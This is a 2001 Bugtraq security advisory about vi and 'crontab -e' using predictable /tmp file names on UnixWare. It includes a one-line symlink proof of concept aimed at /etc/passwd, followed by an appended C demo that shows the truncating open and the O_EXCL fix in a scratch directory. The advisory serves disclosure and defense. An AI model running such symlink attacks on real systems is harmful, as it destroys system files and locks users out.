From thief@snosoft.com Tue May 29 10:30:59 2001
From: Richard Johnson
To: bugtraq@securityfocus.com
Cc: "Recon@Snosoft. Com"
Date: Tue, 22 May 2001 14:15:16 -0400
Subject: [SRT2001-09] - vi and crontab -e /tmp issues

======================================================================
Strategic Reconnaissance Team Security Advisory(SRT2001-9)
Topic: vi and crontab -e /tmp issues
Vendor: Santa Cruz Operations
Release Date: 05/07/01
======================================================================

.: Description
vi makes poor use of /tmp. File names are very predictable.

.: Impact
As a user, run ln -s /etc/passwd /tmp/Ex04161 and wait for root to run vi. Voila: when he does, he will clobber /etc/passwd with a null file.

.: Workaround
Don't use vi or crontab -e.

.: Systems Affected
Unixware 5.x

.: Proof of Concept
ln -s /etc/passwd /tmp/Ex04161

.: Vendor Status
A copy of this advisory was mailed to their attention.

.: Credit
Kevin Finisterre
dotslash@snosoft.com

======================================================================
©Copyright 2001 Secure Network Operations, Inc. All Rights Reserved.
Strategic Reconnaissance Team | recon@snosoft.com
http://recon.snosoft.com | http://www.snosoft.com
----------------------------------------------------------------------
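The flaw class described above, as an added example that is not part of the original advisory or the vendor's code: a guessable temp name opened with truncation follows a pre-planted symlink, while O_CREAT|O_EXCL refuses it. The editor's real open flags are not shown in the advisory, so `open_predictable` is an assumed illustration; `run_case`, the scratch directory and the stand-in victim file are constructed for the demo.

```c
#define _XOPEN_SOURCE 700
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Unsafe pattern (assumed, for illustration): open a guessable name,
 * following symlinks and truncating whatever the name resolves to. */
int open_predictable(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
}

/* Hardened: with O_CREAT|O_EXCL, open() fails with EEXIST if the name
 * already exists, including when it is a symlink planted in advance. */
int open_exclusive(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_EXCL, 0600);
}

/* In a private scratch directory, creates a stand-in victim file and a
 * symlink to it at a guessable temp name, then opens that name. Returns
 * the victim's size afterwards (0 = clobbered), or -1 on setup error. */
long run_case(int hardened, int *open_errno) {
    char dir[] = "/tmp/srtdemoXXXXXX", victim[64], tmpname[64];
    struct stat st;
    if (!mkdtemp(dir)) return -1;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(tmpname, sizeof tmpname, "%s/Ex04161", dir);
    FILE *f = fopen(victim, "w");
    if (!f) return -1;
    fputs("root:x:0:0\n", f);              /* constructed sample content */
    fclose(f);
    if (symlink(victim, tmpname) != 0) return -1;
    errno = 0;
    int fd = hardened ? open_exclusive(tmpname) : open_predictable(tmpname);
    *open_errno = fd < 0 ? errno : 0;
    if (fd >= 0) close(fd);
    long size = stat(victim, &st) == 0 ? (long)st.st_size : -1;
    unlink(tmpname); unlink(victim); rmdir(dir);
    return size;
}

int main(void) {
    int e1, e2;
    long a = run_case(0, &e1), b = run_case(1, &e2);
    printf("predictable open: victim size %ld\n", a);
    printf("exclusive open:   victim size %ld (%s)\n", b, strerror(e2));
    return 0;
}
```

In production code, mkstemp() combines an unpredictable name with the same exclusive-create semantics, which removes the guessable name as well.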